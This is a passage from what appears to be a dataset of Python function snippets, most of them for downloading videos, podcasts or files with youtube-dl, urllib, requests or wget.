slugify(line[2]))\n try:\n download_video(line[3], os.path.join(directory, fn))\n except NoDownloadMeNoLikeyException:\n failed_videos.append(line)\n\n print ''\n if failed_videos:\n print 'FAILED VIDEOS:'\n for fail in failed_videos:\n print ' ' + '\\t'.join(fail)\n print ''\n\n print 'Total videos: {0}'.format(len(data[category]))\n print 'Total time: {0}'.format(format_duration(time.time() - start_time))\n return 0", "def youtubefetch(url,outputp=''):\n\toutputpath = os.path.expanduser(outputp)\n\tif (os.path.exists(outputpath) & os.path.isdir(outputpath)) != True:\n\t\toutputpath = '/tmp/'\n\t\n\t(_,_,urlproper) = url.partition(\"?\")\n\t(urlproper,_,_) = urlproper.partition(\"&\")\n\turlproper = \"http://proxy.cs.tcd.ie:8080/www.youtube.com/watch?\" + urlproper\n\tpage = urllib2.urlopen(url).readlines()\n\tfilteredpage = [ elem for elem in page if elem.find(\"fullscreenUrl\") != -1 ]\n\tif (len(filteredpage) == 0):\n\t\treturn 'failed'\n\t\t\n\tfilteredpage = filteredpage[0]\n\t(_, p1, partialurl) = filteredpage.partition(\"video_id=\")\n\t(partialurl , _, name) = partialurl.rpartition(\"&title=\")\n\t(name,_,_) = name.partition(\"'\")\n\tvideourl = \"http://www.youtube.com/get_video.php?\" + p1 + partialurl\n\tvideo = urllib2.urlopen(videourl).read()\n\t#print videourl\n\t#print name\n\toutputfile = open((outputpath+name+\".flv\"),'wb')\n\toutputfile.write(video)\n\toutputfile.flush()\n\toutputfile.close()\n\treturn outputpath+name+\".flv\"", "def download_vid(item):\n vid_name, vid_id = item\n vid = Video(vid_name, vid_id, resolution='224p')\n vid.download()", "def download_from_youtube():\n linkinput = input(\"Enter the url you want to download: \")\n youtube_object = Youtube(linkinput)\n youtube_object.youtube()", "def youtube_dl_latest(args=None):\n args = parse_youtube_dl_arguments(args=args)\n download_videos(channels_file=args.channels_file, hierarchy=args.hierarchy)", "def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"", "def download_forward_video_url(self, download_forward_video_url):\n\n self._download_forward_video_url = download_forward_video_url", "def download_flickr_video(url, save_root, force_overwrite):\n\n # (Try to) open the URL\n response = urlopen(url)\n # Extract the file extension from the resolved URL\n m = re.match(r'(.*)\\?s=.*', response.url)\n _, ext = os.path.splitext(m.group(1))\n # Build the path to save the video to\n video_meta = parse.parse(VIDEO_URL_FORMAT, url)\n user_id = video_meta['user_id']\n video_id = video_meta['video_id']\n save_path = os.path.join(save_root, f'{user_id}-{video_id}{ext}')\n # Save the video\n if os.path.isfile(save_path) and not force_overwrite:\n raise FileExistsError(f'File already exists at {save_path}')\n else:\n with open(save_path, 'wb') as f:\n shutil.copyfileobj(response, f)\n\n return save_path", "def download_video_url(\n video_url: str,\n pipeline: PipelineContext,\n destination=\"%(title)s.%(ext)s\",\n progress=ProgressMonitor.NULL,\n):\n\n config = pipeline.config\n logger = logging.getLogger(__name__)\n logger.info(\"Starting video download from URL: %s\", video_url)\n\n # Setup progress-tracking\n progress.scale(total_work=1.0)\n progress_tracker = YDLProgressTracker(show_progress_bar=True)\n\n # Resolve destination path template\n output_template = complete_template(config.sources.root, destination)\n logger.info(\"Output template: %s\", output_template)\n\n ydl_opts = {\n \"format\": \"mp4\",\n \"logger\": YDLLogger(logger),\n \"progress_hooks\": [progress_tracker.hook],\n \"outtmpl\": output_template,\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n # Determine destination file name\n video_info = ydl.extract_info(video_url, download=False)\n file_name = ydl.prepare_filename(video_info)\n logger.info(\"Downloading file: %s\", file_name)\n\n # Download file\n with progress_tracker.track(progress):\n ydl.download([video_url])\n\n progress.complete()\n return file_name", "def downloader(thread_num):\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + name, link])\n tries += 1\n if (not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)", "def download(target_url):\n program_location = sys.executable\n program_name = \"youtube-dl.exe\"\n # Define arguments. see this url for help\n # https://github.com/rg3/youtube-dl\n ignore_errors = \"-i\"\n safe_filenames = \"--restrict-filenames\"\n output_arg = \"-o\"\n output_template = \"download\\%(uploader)s\\%(playlist)s\\%(title)s-%(id)s.%(ext)s\"\n command = [program_name, ignore_errors, safe_filenames, output_arg, output_template, target_url]\n result = subprocess.call(command)\n print \"Command result: \", result", "def download(urls, dest_folder):\n pass", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def download(self, url_match):\n pass", "def video_download_chain_task(uuid):\n chain = signature(\n 'wts_worker.worker.video_download',\n kwargs={'uuid': uuid},\n )\n chain |= signature(\n 'wts_worker.worker.video_register_title',\n kwargs={'uuid': uuid},\n )\n return chain.apply_async()", "def _download(item):\n\n filename = item.filename()\n filename = os.path.join(item.vdir(), filename)\n logger.info(\"Downloading '%s' to %s\" % (item.show, filename))\n\n f = open(filename, \"wb\")\n\n buf = net.tivoget(item.show.url)\n for chunk in buf:\n f.write(chunk)\n\n f.close()\n\n item.downloaded = True\n item.save()", "def dowload_vt():\n print get_date_time_now() + \" ==> Download VT Samples started!\"\n print get_date_time_now() + \" ==> Nothing downloaded\"", "def make_video_url(movie_id, api_key):\n\n MOVIE_URL = \"https://api.themoviedb.org/3/movie/\"\n LANG = \"&language=en-US\"\n # Find the youtube key for video trailer\n connection = requests.get(MOVIE_URL + str(movie_id) +\n \"/videos?api_key=\" + api_key + LANG)\n videos_json = json.loads(connection.text)\n connection.close()\n\n if connection.status_code != 200:\n # constant in case issue is found with connection....\n return VIDEO_URL + '5PSNL1qE6VY'\n else:\n if len(videos_json['results']) == 0:\n # constant in case no video is found for given movie....\n return VIDEO_URL + '5PSNL1qE6VY'\n else:\n # If all well we get aa video url for all movie\n # based on discovery or discovery by year\n return VIDEO_URL + videos_json['results'][0]['key']", "def run_download_flickr_video(queue, save_root, force_overwrite):\n\n while True:\n url = queue.get()\n try:\n save_path = download_flickr_video(url, save_root, force_overwrite)\n log('print', f'Saved video to {save_path}')\n except HTTPError as e:\n if e.code == 404:\n log('warn', f'HTTP error 404 returned for URL {url}')\n except FileExistsError as e:\n log('warn', f'File already exists for URL {url}, skipping')\n\n queue.task_done()", "def download(self, account, code):\n\n url = Spider.BASE_URL + \"/p/%s/?taken-by=%s\" % (code, account)\n r = self.session.get(url)\n content_match = re.search(r\"<script.*?>\\s*?window._sharedData\\s*?=\\s*?({.*}).*?</script>\", r.text,\n re.MULTILINE)\n data = json.loads(content_match.group(1))\n media = data['entry_data']['PostPage'][0]['graphql']['shortcode_media']\n download_urls = []\n if media['__typename'] == 'GraphVideo': # video\n download_urls.append(media[\"video_url\"])\n if media['__typename'] == 'GraphImage': # image\n download_urls.append(media[\"display_url\"])\n if media['__typename'] == 'GraphSidecar': # slide\n nodes = media['edge_sidecar_to_children']['edges']\n for node in nodes:\n node = node['node']\n if node['is_video']:\n download_urls.append(node['video_url'])\n else:\n download_urls.append(node['display_url'])\n\n actual_download_dir = os.path.join(download_dir, account)\n if not os.path.isdir(actual_download_dir):\n os.mkdir(actual_download_dir)\n for url in download_urls:\n filename = os.path.join(actual_download_dir, url.split('/')[-1].split('?')[0])\n temp_name = filename + '.tmp'\n if os.path.isfile(filename):\n if self.spider.auto_stop:\n print('file', filename, \"already exists, exiting......\")\n sys.exit()\n print('file', filename, \"already exists, skipping\")\n else:\n print('downloading %s:' % filename)\n r = self.session.get(url, stream=True)\n content_length = int(r.headers['content-length'])\n curr = 0\n with open(temp_name, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n f.write(chunk)\n curr += 1024\n progress(curr, content_length)\n os.rename(temp_name, filename)\n self.spider.item_count += 1", "def download_by_link(link: str, videoid: str) -> [str, str]:\n\t# set youtube_dl arguments \n\tydl_opts = {\n\t\t'quiet': False, # don't write in output\n\t\t'no_warnings': True, # write warnings in output\n\t\t'format': \"bestaudio/best\", # download best audio quality\n\t\t'format': 'mp4', # setup format webm\n\t\t'outtmpl': '%(name)s' + str(videoid) + '.%(ext)s', # setup output name \n\t\t'postprocessor': [{ # dk how this need work, but if this not setup audio didn't download\n\t\t\t'key': \"FFmpegExtractAudioPP\",\n\t\t\t'preferredquality': \"512\",\n\t\t }],\n\t}\n\t# start download audio\n\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\tdata = ydl.extract_info(link) # exctrat info about audio\n\tfake_name = \"NA\" + str(videoid)\n\t# TODO: think about this query \n\t# refactoring title \n\ttitle = data.pop('title')\n\ttitle = re.sub(r'[^\\w]', ' ', title)\n\ttitle = translate(title)\n\ttitle = title.replace(' ', '_')\n\treturn fake_name, title", "def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')", "def podcast_download(self):\r\n warnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n now = datetime.datetime.now()\r\n\r\n for podcast_file in self.podcast_list:\r\n published, name, link, title = podcast_file\r\n if self.podcast_list != []:\r\n line_file = (published + ';' + title + ';' + name + ';' + link).encode(\"utf-8\") \r\n if line_file in open(self.download_log).read():\r\n pass\r\n else:\r\n title = unicodedata.normalize('NFKD', title).encode('ascii', 'ignore')\r\n download_folder = os.path.join('downloads', title)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n try:\r\n published = str(parser.parse(published))[:10]\r\n except IOError as error:\r\n print 'Error' + (error) + ': File - ' + str(title)\r\n download_folder = os.path.join(download_folder, published)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n namefile_unicode = link[link.rfind('/')+1:]\r\n namefile_str = unicodedata.normalize('NFKD', \r\n namefile_unicode).encode('ascii', 'ignore')\r\n namefile_str = namefile_str.decode('utf-8', 'ignore').encode(\"utf-8\")\r\n if '.mp3' in namefile_str:\r\n len_name = namefile_str.index('.mp3')\r\n elif '.MP3' in namefile_str:\r\n len_name = namefile_str.index('.MP3')\r\n namefile_str = namefile_str[:len_name + 4]\r\n fileoutput = os.path.join(download_folder, namefile_str)\r\n name = unicodedata.normalize('NFKD', name).encode('ascii', 'ignore')\r\n print str(published) + '; ' + name\r\n ## downlink\r\n download_file(link, fileoutput) \r\n ## tagging\r\n mp3_tagging(fileoutput, podcast_file)\r\n ## write log\r\n write_file(self.download_log, line_file)\r\n end = datetime.datetime.now()\r\n print '\\r' + 'Download Time = ' + str(end-now) + '\\r'\r\n return None", "def extract_url_download(update: Update, context: CallbackContext) -> None:\r\n received_text = update.message.text\r\n yt_urls = get_link_text(received_text)\r\n yt_urls_msg = update.message.reply_text(pretty_url_string(yt_urls), disable_web_page_preview=True)\r\n if len(yt_urls) > 0:\r\n for url in yt_urls:\r\n if 'list=' in url:\r\n print(\"dshgshj\")\r\n\t\t\t\t# download_playlist_url(update, context, url)\r\n else:\r\n download_url(update, context, url)\r\n context.bot.delete_message(message_id=yt_urls_msg.message_id, chat_id=yt_urls_msg.chat_id)", "def download_urls(urls_filename, reverse=True, log_filename='youtube-playlist-download.log'):\n urls_file = open(urls_filename)\n url_lines = urls_file.read().splitlines();\n urls_file.close()\n if reverse:\n url_lines = reversed(url_lines)\n\n logfile = open(log_filename, 'w')\n logfile.write('\\n' + str(datetime.now()) + '\\n')\n logfile.flush()\n\n # use -f best to avoid merging and just get the best overall format (saves time)\n youtube_cmd_with_args = ['youtube-dl', '--ignore-errors', '--ignore-config', '--write-info-json', '--no-mtime', '-f best', '-o ' + get_full_filename()]\n\n try:\n for line in url_lines:\n url_id, title = line.split('\\t')[:2]\n print('Downloading video: \"' + title + '\" with id \"' + url_id + '\"')\n run(youtube_cmd_with_args + [YT_PREFIX + url_id])\n print('Done downloading url:', url_id)\n notify('Done downloading url:' + url_id)\n logfile.write('Downloaded\\t' + url_id + '\\t' + title + '\\n')\n logfile.flush()\n except KeyboardInterrupt as e:\n print(\"Exiting\")\n logfile.close()\n\n logfile.close()", "def download(self, url: str, dest: PathLike, force: bool = False):", "def __init__(self, download_time):\n self._ies = []\n #self._pps = []\n self._download_retcode = 0\n self._num_downloads = 0\n if (config_pytomo.LOG_FILE == '-') or (not config_pytomo.LOG_FILE):\n self._screen_file = sys.stdout\n elif config_pytomo.LOG_FILE_TIMESTAMP:\n # I don't like it this way...\n self._screen_file = open(config_pytomo.LOG_FILE_TIMESTAMP, 'a')\n else:\n # not very good\n self._screen_file = sys.stdout\n self.state = BUFFERING_STATE\n self.accumulated_playback = 0.0\n self.accumulated_buffer = 0.0\n self.current_buffer = 0.0\n self.interruptions = 0\n self.current_time = None\n self.start_playback = None\n self.encoding_rate = None\n self.data_len = None\n self.data_duration = None\n self.max_instant_thp = None\n self.video_type = None\n self.redirect_url = None\n self.initial_data = None\n self.initial_rate = None\n self.initial_playback_buffer = None\n self.flv_timestamp = None\n self.previous_timestamp = None\n self.time_to_get_first_byte = None\n try:\n self.download_time = int(download_time)\n except ValueError:\n config_pytomo.LOG.exception(\n \"Please provide a number as max download time. Got : %s\",\n download_time)\n self.download_time = config_pytomo.DOWNLOAD_TIME\n config_pytomo.LOG.info('Set max download_time as: %d',\n self.download_time)\n if self.download_time <= 0:\n self.download_time = config_pytomo.MAX_DOWNLOAD_TIME\n config_pytomo.LOG.debug('Max download_time is: %d',\n self.download_time)\n #self.quiet = quiet\n #self.params = params'", "def test_techtv_video_download_nofiles(logged_in_client, is_public, mocker):\n mocker.patch(\"ui.views.redirect\")\n client, _ = logged_in_client\n client.logout()\n ttv_video = TechTVVideoFactory(video=VideoFactory(is_public=is_public))\n assert ttv_video.video.download is None\n url = reverse(\"techtv-download\", kwargs={\"video_key\": ttv_video.ttv_id})\n result = client.get(url)\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def play_video(path):\r\n #logger.info(\"######: {}, log: {}########\".format('rk8', path))\r\n #original=https://api.hotstar.com/h/v1/play?contentId=1000238814\r\n #path=\"https://api.hotstar.com/h/v2/play/in/contents/1000238814\"\r\n # Create a playable item with a path to play.\r\n data = make_request(path)\r\n #logger.info(\"######: {}, log: {}########\".format('rk3', path))\r\n if not data:\r\n return\r\n\r\n def get_subtitle(url):\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 265b9dab22d4e9a033e6df6f89639f17/master.m3u8?hdnea=st=1560107863~exp=1560111463~acl=\r\n # /*~hmac=2f6fb393159ed5fa1b12bbf12e954eb377cfa0fc852d4ff5eb24446233237620\r\n #\r\n # https://hses.akamaized.net/videos/hotstarint/hostages/1260003409/1558430241469/\r\n # 5d0f83c3ccbf4501cf952bdfc8c0d785/subtitle/lang_en/sub-0.vtt\r\n #\r\n _url = urlparse(url)\r\n values = _url._asdict()\r\n values['query'] = ''\r\n values['path'] = '{}/subtitle/lang_en/sub-0.vtt'.format(\"/\".join(values['path'].split('/')[:-1]))\r\n\r\n subtitle_url = ParseResult(**values).geturl()\r\n # subtitle_file = kodiutils.download_url_content_to_temp(subtitle_url, '{}-{}.srt'.format(\r\n # Zee5Plugin.safe_string(item['title']),\r\n # subtitle_lang,\r\n # ))\r\n\r\n return subtitle_url\r\n\r\n #logger.info(\"######: {}, log: {}########\".format('rk6', data))\r\n #item = data['body']['results']['item']\r\n item=data['body']['results']['playBackSets'][0]\r\n path = item['playbackUrl']\r\n licenseURL = item.get('licenseUrl')\r\n subtitle = get_subtitle(path)\r\n\r\n logger.info('Playing video URL: {}, licenseURL: {}, subtitle: {}'.format(path, licenseURL, subtitle))\r\n\r\n play_item = xbmcgui.ListItem(path=path)\r\n if licenseURL:\r\n play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')\r\n play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')\r\n play_item.setMimeType('application/dash+xml')\r\n play_item.setContentLookup(False)\r\n\r\n play_item.setSubtitles([get_subtitle(path)])\r\n\r\n # Pass the item to the Kodi player.\r\n xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)", "def download(self, language, filename, filetype):\n if language not in self.languages.keys():\n print \"Theres's no subtitle in this language\"\n sys.exit()\n url = \"http://www.youtube.com/api/timedtext?v={0}&lang={1}\".format(self.video_id, language)\n self.subtitle = urllib2.urlopen(url)\n if filetype == \"srt\":\n self.writeSRTFile(filename)\n else:\n self.writeXMLFile(filename)", "def downloadFile()-> None:\n logging.info(f\"Downloading current data set {getTime()}\")\n with open(DATA_FILE,\"wb\") as f:\n f.write(get(\"https://covid.ourworldindata.org/data/owid-covid-data.csv\").text.encode())\n logging.info(f\"Finished Downloading current data set {getTime()}\")", "def downloader(urls, path):\n counter = 1\n for media_file in urls:\n # Create the file name\n file_name = \"meme\" + str(counter) + \".jpg\"\n file_location = path + \"/\" + file_name\n print(f\"Downloading {media_file} as {file_name}.\")\n # Overwrite files\n if os.path.exists(file_location):\n os.remove(file_location)\n print(f\"{file_name} will overwrite an existing file of the same name.\")\n wget.download(media_file, out=file_location)\n print(\"\\n\")\n counter += 1\n print(f\"{counter - 1} items were downloaded.\")\n return counter - 1", "async def download(self, ctx, *, song):\n try:\n with youtube_dl.YoutubeDL(ytdl_download_format_options) as ydl:\n if \"https://www.youtube.com/\" in song:\n download = ydl.extract_info(song, True)\n else:\n infosearched = ydl.extract_info(\n \"ytsearch:\"+song, False)\n download = ydl.extract_info(\n infosearched['entries'][0]['webpage_url'], True)\n filename = ydl.prepare_filename(download)\n embed = discord.Embed(\n title=\"Your download is ready\", description=\"Please wait a moment while the file is beeing uploaded\")\n await ctx.send(embed=embed, delete_after=30)\n await ctx.send(file=discord.File(filename))\n os.remove(filename)\n except (youtube_dl.utils.ExtractorError, youtube_dl.utils.DownloadError):\n embed = discord.Embed(title=\"Song couldn't be downloaded\", description=(\"Song:\"+song))\n await ctx.send(embed=embed)", "def death_as_a_service(vid_path='vids', max_downloads=4,\n to_imgur=False, to_tumblr=True, to_snapchat=True):\n print \"Fetching new videos and consolidating queue...\"\n yt.populate_queue()\n yt.dl(max_downloads)\n extract_and_upload(vid_path, to_imgur=to_imgur,\n to_tumblr=to_tumblr, to_snapchat=to_snapchat)", "def download_course_given(self, course_url: str):\n self.course_url = course_url\n self.get_course_page()\n self.get_course_title()\n self.get_course_unit_titles()\n self.get_course_unit_slugs()\n self.get_course_unit_urls()\n\n print(\"\\nGenerating Path Slugs...\\n\")\n self.get_course_all_slugs()\n self.get_course_youtube_ids()\n self.download_course_videos()", "def save_link_time(return_list, path_to_download):\n\n # Opens a new file and writes lines to it and saves it at the spot provided\n with open(os.path.join(path_to_download, \"yt_vids.txt\"), \"w\") as w:\n w.write('\\n'.join('{} {} {}'.format(\n x[0], x[1][0], x[1][1]) for x in return_list))", "def getDownload(self, html, episode_number):\n soup = BeautifulSoup(html, \"html.parser\")\n download = soup.find_all('source')\n if download:\n self.downloads[\"Episode %s.mp4\" % str(episode_number)] = download[0]['src']\n return\n\n print(\"[!] Download link not found for episode %s\" % str(episode_number))", "def download_link(url,save_dir):\n global downloaded_links\n global urlcnt\n if url in downloaded_links.keys(): return None\n m = re.search('\\?id=([a-zA-Z0-9.]+)', url)\n unique_name = m.group(1)\n unique_name = unique_name.replace(\".\",\"_\")\n text_name = unique_name + \".txt\"\n html = urlopen(url).read()\n text_file = open(save_dir + \"/{0}\".format(text_name),\"w\")\n urlcnt += 1\n text_version = get_gp_text_description(html)\n text_file.write(text_version)\n text_file.close()\n downloaded_links[url] = True\n print(\"Downloaded {0} and saved it in '{1}' as {2}\".format(url, save_dir, unique_name))\n return html", "def extract_videos(download_dir, extract_dir):\n\n filename = os.path.join(download_dir, 'UCF101.rar')\n patoolib.extract_archive(filename, outdir=extract_dir)\n\n # os.remove(filename)\n\n return None", "def downloadHttpFileAtTime(outputDir, urlPartsQ, cameraID, closestTime, verboseLogs):\n imgPath = getImgPath(outputDir, cameraID, closestTime)\n if verboseLogs:\n logging.warning('Local file %s', imgPath)\n if os.path.isfile(imgPath):\n logging.warning('File %s already downloaded', imgPath)\n return imgPath\n\n closestFile = str(closestTime) + '.jpg'\n urlParts = urlPartsQ[:] # copy URL parts array\n urlParts.append(closestFile)\n # logging.warning('File URLparts %s', urlParts)\n url = '/'.join(urlParts)\n logging.warning('File URL %s', url)\n\n # urllib.request.urlretrieve(url, imgPath)\n resp = requests.get(url, stream=True)\n with open(imgPath, 'wb') as f:\n for chunk in resp.iter_content(chunk_size=8192):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n resp.close()\n return imgPath", "def mp4_url(self) -> str:\n\t\treturn 'video.mp4?oid={0}'.format(self._oid)", "def download_videos(self, path, since=None, camera=\"all\", stop=10, debug=False):\n if since is None:\n since_epochs = self.last_refresh\n else:\n parsed_datetime = parse(since, fuzzy=True)\n since_epochs = parsed_datetime.timestamp()\n\n formatted_date = get_time(time_to_convert=since_epochs)\n _LOGGER.info(\"Retrieving videos since %s\", formatted_date)\n\n if not isinstance(camera, list):\n camera = [camera]\n\n for page in range(1, stop):\n response = api.request_videos(self, time=since_epochs, page=page)\n _LOGGER.debug(\"Processing page %s\", page)\n try:\n result = response[\"media\"]\n if not result:\n raise IndexError\n except (KeyError, IndexError):\n _LOGGER.info(\"No videos found on page %s. Exiting.\", page)\n break\n\n self._parse_downloaded_items(result, camera, path, debug)", "def test_video_download_nofiles(logged_in_client, is_public, mocker):\n mocker.patch(\n \"ui.views.redirect\", return_value=HttpResponseRedirect(redirect_to=\"/\")\n )\n client, _ = logged_in_client\n client.logout()\n video = VideoFactory(is_public=is_public)\n assert video.download is None\n url = reverse(\"video-download\", kwargs={\"video_key\": video.hexkey})\n result = client.get(url)\n assert result.status_code == status.HTTP_404_NOT_FOUND", "def ytd(title, url ):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'm4a',\n # 'preferredquality': '192',\n }],\n 'progress_hooks': [download_hook],\n 'outtmpl': title + '.%(ext)s',\n }\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n return(title + \".m4a\")", "def download_feed_item(feed_item, base_directory):\n join_path = partial(os.path.join, base_directory)\n\n base_filename = base_filename_for_feed_item(feed_item)\n\n json_filename = join_path(\"{}.json\".format(base_filename))\n\n if os.path.exists(json_filename):\n # Stop here, we already have this video.\n return\n\n content = highest_quality_content(\n download_info_for_feed_item(feed_item)\n )\n\n video_content = (\n content[0]\n if isinstance(content, tuple) else\n content\n )\n\n assert video_content.media_type.has_video\n\n video_filename = join_path(\"{}.{}\".format(\n base_filename, video_content.media_type.file_type\n ))\n\n if os.path.exists(video_filename):\n # Delete the video file if it's there already.\n os.remove(video_filename)\n\n if isinstance(content, tuple):\n # Download video and audio at the same time.\n que = Queue()\n exception_queue = Queue()\n\n def download_in_queue():\n try:\n download_to_file(*que.get())\n except Exception as ex:\n exception_queue.put(ex)\n\n # TODO: It would be nice to be able to terminate the other\n # thread here.\n\n if isinstance(ex, (KeyboardInterrupt, SystemExit)):\n # Re-raise interrupts so cleanup code works.\n raise ex\n finally:\n que.task_done()\n\n temp_video_filename = tempfile.mkstemp(prefix= base_filename)[1]\n temp_audio_filename = tempfile.mkstemp(prefix= base_filename)[1]\n\n try:\n que.put((content[0].url, temp_video_filename))\n que.put((content[1].url, temp_audio_filename))\n\n for i in range(2):\n Thread(target= download_in_queue).start()\n\n que.join()\n\n if not exception_queue.empty():\n raise exception_queue.get()\n\n # Now use ffmpeg to join the audio and video content together.\n subprocess.check_call((\n \"ffmpeg\",\n \"-i\", temp_video_filename,\n \"-i\", temp_audio_filename,\n \"-c\", \"copy\", os.path.abspath(video_filename)\n ))\n finally:\n # Clean up temporary files.\n os.remove(temp_video_filename)\n os.remove(temp_audio_filename)\n else:\n # Download one audio-video file.\n download_to_file(video_content.url, video_filename)\n\n # Now write the JSOn file with the metadata.\n with open(json_filename, \"w\") as out_file:\n json.dump({\n \"version\": JSON_FORMAT_VERSION,\n \"content\": (\n [content[0].to_json(), content[1].to_json()]\n if isinstance(content, tuple) else\n [content.to_json()]\n ),\n \"feed_item\": feed_item.to_json(),\n }, out_file)\n\n return (video_filename, json_filename)", "def download_file():\n for lines in urls:\n try:\n req.urlretrieve(lines, '{0}/{1}'.format(folder_path, lines.split('/')[-1]))\n time.sleep(1)\n print ('File - {} - downloaded successfully'.format(lines.split('/')[-1]))\n except urllib.error.HTTPError:\n print('File is missing or not reachable')\n print('Download Complete & Successful!')", "def process_download_flv(self, data, meta_file_name, connection_time):\n # content-length in bytes\n self.data_len = float(data.info().get('Content-length', None))\n config_pytomo.LOG.debug('Content-length: %s' % self.data_len)\n #meta_file = open(meta_file_name, 'ab')\n meta_file = open(meta_file_name, 'ab+')\n flv_tags = tags.FLV(meta_file)\n self._total_bytes = 0\n #nb_zero_data = 0\n self.state = INITIAL_BUFFERING_STATE\n #block_size = 1024\n block_size = 1\n start = time.time()\n config_pytomo.LOG.debug('start time: %s' % start)\n while True:\n # Download and write\n before = time.time()\n if (before - start) > self.download_time:\n config_pytomo.LOG.debug('Downloaded video during %i seconds, '\n 'stopping' % (before - start))\n break\n # read in bytes\n data_block = data.read(block_size)\n if not self.time_to_get_first_byte:\n first_byte_time = time.time()\n self.time_to_get_first_byte = first_byte_time - connection_time\n block_size = 1024\n data_block_len = len(data_block)\n if data_block_len == 0:\n config_pytomo.LOG.debug('\\nFinished downloading video')\n break\n write_no_seek(meta_file, data_block)\n self._total_bytes += data_block_len\n self.update_with_tags(flv_tags)\n after = time.time()\n if not self.data_duration:\n try:\n self.data_duration = get_data_duration(meta_file_name)\n except ParseError, mes:\n config_pytomo.LOG.info('data duration not yet found: %s'\n % mes)\n self.current_time = after - start\n time_difference = after - before\n self.update_state(time_difference)\n block_size = self.best_block_size(time_difference, data_block_len)\n instant_thp = (8e-3 * data_block_len / (time_difference)\n if (time_difference) != 0 else None)\n if time_difference > MAX_TH_MIN_UPDATE_TIME:\n self.max_instant_thp = max(self.max_instant_thp, instant_thp)\n meta_file.close()\n return after - start", "def getMP4DownloadLink(self):\n context = aq_inner(self.context)\n extension = '?e=.mp4'\n return context.absolute_url() + '/downloadMP4' + extension", "def download(all):\n print(\"Downloading\")", "def movieid_first_video_url(self, movie_id):\n YOUTUBE_URL = \"https://www.youtube.com/watch?v=\"\n VIDEOS_URL = \"https://api.themoviedb.org/3/movie/%s/videos\"\n url_with_movieid = VIDEOS_URL % (movie_id)\n parm_dict = {\"api_key\": self.api_key, \"language\": self.language}\n url = url_with_movieid + \"?\" + urlencode(parm_dict, doseq=True)\n # print url\n\n response = requests.get(url)\n json_dict = json.loads(response.text)\n response.close()\n\n youtube_video_key = json_dict['results'][0]['key']\n return YOUTUBE_URL + youtube_video_key", "def spider(given_url):\n \n url_to_crawl = given_url\n\n source_code = requests.get(url_to_crawl)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text)\n # name = soup.find('h1', {'class': 'pl-header-title'})\n # name = name.string\n # name = str(name)\n # name = name.strip('')\n # fw = open('links of' + name + '.txt', 'w')\n # fw2 = open('names of' + name + '.txt', 'w')\n fw = open('links.txt', 'w')\n fw2 = open('names.txt', 'w')\n for link in soup.findAll('a', {'class': 'pl-video-title-link yt-uix-tile-link yt-uix-sessionlink spf-link '}):\n my_href = 'https://www.youtube.com' + link.get('href')\n title = link.string\n #print(my_href, title)\n fw.write(my_href + '\\n')\n fw2.write(title)\n\n fw.close()\n fw2.close()\n\n \"\"\"Downloading Part\"\"\"\n try:\n os.system(\"youtube-dl --max-quality FORMAT -a links.txt\")\n return\n except:\n print(\"Something went wrong related to downloading\")\n exit(2)", "def download(server):\n for i in range(10):\n start_time = time.time()\n logging.debug('Start downloading: %d' % i)\n os.system(\"scp %s:18DOWNLOAD downloads/\" % server)\n end_time = time.time()\n logging.debug('End downloading...')\n logging.debug('Time taken by downloader: %s' % (end_time - start_time))", "def download_files(self):", "def yt_url(url, 